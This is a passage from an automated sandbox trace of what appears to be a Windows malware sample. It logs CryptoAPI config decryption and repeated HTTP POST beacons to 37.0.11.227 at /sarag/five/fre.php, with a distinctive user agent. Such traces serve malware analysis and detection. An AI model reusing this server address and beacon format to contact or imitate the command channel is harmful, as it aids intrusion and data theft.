pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0309.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.757] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0309.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.757] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0309.757] GetProcessHeap () returned 0x690000 [0309.757] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0309.758] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.758] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0309.759] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.759] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0309.760] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.760] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0309.760] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.761] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0309.761] GetProcessHeap () returned 0x690000 [0309.761] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0309.761] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0309.761] GetProcessHeap () returned 0x690000 [0309.761] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0309.761] GetProcessHeap () returned 0x690000 [0309.761] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0309.763] GetProcessHeap () returned 0x690000 [0309.763] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0309.763] GetProcessHeap () returned 0x690000 [0309.763] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0309.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.764] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0309.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.768] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0309.772] GetProcessHeap () returned 0x690000 [0309.772] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0309.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.773] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0309.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.774] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0309.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.775] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0309.775] GetProcessHeap () returned 0x690000 [0309.775] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0309.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.777] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0309.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.778] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0309.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.779] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0309.779] GetProcessHeap () returned 0x690000 [0309.779] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0309.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.780] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0309.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.781] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0309.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.782] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0309.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.782] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0309.782] GetProcessHeap () returned 0x690000 [0309.782] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0309.782] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0309.782] GetProcessHeap () returned 0x690000 [0309.782] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4d0 [0309.782] socket (af=2, type=1, protocol=6) returned 0xa5c [0309.783] connect (s=0xa5c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0309.808] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0309.808] GetProcessHeap () returned 0x690000 [0309.808] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0309.818] GetProcessHeap () returned 0x690000 [0309.818] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0309.819] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0309.820] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0309.820] GetProcessHeap () returned 0x690000 [0309.820] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0309.820] GetProcessHeap () returned 0x690000 [0309.820] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0309.821] GetProcessHeap () returned 0x690000 [0309.821] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0309.821] GetProcessHeap () returned 0x690000 [0309.821] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0309.821] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0309.822] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0309.822] GetProcessHeap () returned 0x690000 [0309.822] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0309.822] GetProcessHeap () returned 0x690000 [0309.823] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0309.823] send (s=0xa5c, buf=0x6ad508*, len=242, flags=0) returned 242 [0309.823] send (s=0xa5c, buf=0x6aba40*, len=159, flags=0) returned 159 [0309.823] GetProcessHeap () returned 0x690000 [0309.823] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0309.824] recv (in: s=0xa5c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0309.901] GetProcessHeap () returned 0x690000 [0309.902] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0309.902] GetProcessHeap () returned 0x690000 [0309.903] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0309.903] GetProcessHeap () returned 0x690000 [0309.903] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0309.904] GetProcessHeap () returned 0x690000 [0309.904] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0309.904] closesocket (s=0xa5c) returned 0 [0309.904] GetProcessHeap () returned 0x690000 [0309.904] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4d0 | out: hHeap=0x690000) returned 1 [0309.904] GetProcessHeap () returned 0x690000 [0309.905] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0309.905] GetProcessHeap () returned 0x690000 [0309.905] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0309.905] GetProcessHeap () returned 0x690000 [0309.906] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0309.906] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17e0) returned 0xa5c [0309.907] Sleep (dwMilliseconds=0xea60) [0309.909] GetProcessHeap () returned 0x690000 [0309.909] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0309.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.910] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0309.914] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.914] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0309.919] GetProcessHeap () returned 0x690000 [0309.919] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0309.920] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.920] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0309.921] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.921] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0309.921] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.922] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0309.922] GetProcessHeap () returned 0x690000 [0309.922] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0309.923] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.923] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0309.924] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.924] CryptDestroyKey (hKey=0x69d028) returned 1 [0309.925] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.925] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0309.925] GetProcessHeap () returned 0x690000 [0309.925] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0309.925] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.926] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0309.927] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.927] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0309.927] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.928] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0309.928] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.929] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0309.929] GetProcessHeap () returned 0x690000 [0309.929] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0309.929] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0309.929] GetProcessHeap () returned 0x690000 [0309.929] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0309.929] GetProcessHeap () returned 0x690000 [0309.930] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0309.930] GetProcessHeap () returned 0x690000 [0309.930] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0309.930] GetProcessHeap () returned 0x690000 [0309.930] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0309.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.931] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0309.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.935] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0309.939] GetProcessHeap () returned 0x690000 [0309.939] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0309.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.940] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0309.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.941] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0309.941] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.942] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0309.942] GetProcessHeap () returned 0x690000 [0309.942] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0309.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.943] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0309.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.944] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0309.944] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.944] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0309.945] GetProcessHeap () returned 0x690000 [0309.945] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0309.945] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.945] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0309.946] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.946] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0309.947] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.947] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0309.948] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.948] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0309.948] GetProcessHeap () returned 0x690000 [0309.948] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0309.948] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0309.948] GetProcessHeap () returned 0x690000 [0309.948] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0309.948] socket (af=2, type=1, protocol=6) returned 0xa60 [0309.948] connect (s=0xa60, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0309.978] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0309.978] GetProcessHeap () returned 0x690000 [0309.978] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0309.978] GetProcessHeap () returned 0x690000 [0309.978] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0309.979] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0309.980] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0309.980] GetProcessHeap () returned 0x690000 [0309.980] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0309.980] GetProcessHeap () returned 0x690000 [0309.981] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0309.981] GetProcessHeap () returned 0x690000 [0309.981] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0309.981] GetProcessHeap () returned 0x690000 [0309.981] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0309.982] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0309.983] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0309.983] GetProcessHeap () returned 0x690000 [0309.983] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0309.983] GetProcessHeap () returned 0x690000 [0309.983] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0309.983] send (s=0xa60, buf=0x6ad508*, len=242, flags=0) returned 242 [0309.984] send (s=0xa60, buf=0x6aba40*, len=159, flags=0) returned 159 [0309.984] GetProcessHeap () returned 0x690000 [0309.984] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0309.984] recv (in: s=0xa60, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0310.063] GetProcessHeap () returned 0x690000 [0310.064] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0310.064] GetProcessHeap () returned 0x690000 [0310.064] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0310.064] GetProcessHeap () returned 0x690000 [0310.065] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0310.065] GetProcessHeap () returned 0x690000 [0310.065] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0310.065] closesocket (s=0xa60) returned 0 [0310.066] GetProcessHeap () returned 0x690000 [0310.066] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0310.066] GetProcessHeap () returned 0x690000 [0310.066] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0310.066] GetProcessHeap () returned 0x690000 [0310.067] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0310.067] GetProcessHeap () returned 0x690000 [0310.067] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0310.067] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xf2c) returned 0xa60 [0310.102] Sleep (dwMilliseconds=0xea60) [0310.104] GetProcessHeap () returned 0x690000 [0310.104] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0310.104] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.105] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0310.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.149] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0310.155] GetProcessHeap () returned 0x690000 [0310.155] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0310.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.156] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0310.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.157] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0310.160] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.160] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0310.160] GetProcessHeap () returned 0x690000 [0310.160] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0310.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.162] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0310.162] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.162] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0310.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.163] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0310.163] GetProcessHeap () returned 0x690000 [0310.163] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0310.164] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.164] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0310.165] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.165] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0310.165] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.166] StrStrA 